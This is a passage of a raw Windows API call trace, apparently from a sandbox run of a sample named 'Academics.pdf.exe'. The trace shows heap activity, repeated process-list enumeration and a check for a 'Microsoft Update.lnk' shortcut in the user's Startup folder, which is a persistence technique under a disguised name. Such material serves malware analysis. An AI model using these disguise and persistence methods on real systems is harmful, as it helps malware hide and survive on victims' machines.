(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.443] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0318.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0318.444] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0318.444] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0318.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0318.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0318.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0318.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0318.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.445] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.446] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.446] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.446] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0318.448] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.449] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0318.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0318.450] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.451] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.452] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.453] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.454] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.455] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0318.456] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.457] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.458] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0318.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0318.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0318.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0318.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0318.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0318.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0318.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0318.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0318.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0318.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0318.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0318.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0318.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0318.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0318.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0318.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0318.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0318.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0318.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0318.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0318.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0318.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0318.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0318.484] CloseHandle (hObject=0x294) returned 1 [0318.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.485] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.485] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.485] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0318.487] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0318.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 